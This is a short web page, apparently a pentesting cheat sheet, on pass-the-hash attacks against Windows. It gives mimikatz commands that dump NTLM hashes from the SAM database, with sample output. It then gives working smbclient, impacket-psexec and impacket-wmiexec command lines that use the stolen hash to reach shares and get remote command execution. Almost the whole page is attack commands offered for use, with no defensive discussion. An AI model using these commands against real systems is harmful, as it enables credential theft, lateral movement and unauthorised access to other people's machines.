Skip to main content

Passing NTLM hash

After you get NTLM hashes of any user if cracking of password is not feasible could be due to complexity of the password this method can be used to pass the NTLM hash to access resources in windows.

Conditions

Major condition to get the HASH is that a compromised user with System/Admin access.

Get the Hash

using mimikatz to extract the hash from the system

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # token::elevate
...

mimikatz # lsadump::sam
...
RID  : 000001f4 (500)
User : Pawan
  Hash NTLM: BA65AB46C8E2A05C51A6312C93726ACB

Tools to pass the hash

Different tools can be used for different use cases

smbclient
CrackMapexec
impacket-psexec
impacket-wmiexec

Passing Hash using smbclient

smbclient \\\\192.168.1.1\\secrets -U Pawan --pw-nt-hash BA65AB46C8E2A05C51A6312C93726ACB

Passing Hash using impacket-psexec

impacket-psexec -hashes 00000000000000000000000000000000:BA65AB46C8E2A05C51A6312C93726ACB Pawan@192.168.1.1

Passing Hash using impacket-wmiexec

impacket-wmiexec -hashes 00000000000000000000000000000000:BA65AB46C8E2A05C51A6312C93726ACB Pawan@192.168.1.1

Conditions
Get the Hash
Tools to pass the hash
Passing Hash using smbclient
Passing Hash using impacket-psexec
Passing Hash using impacket-wmiexec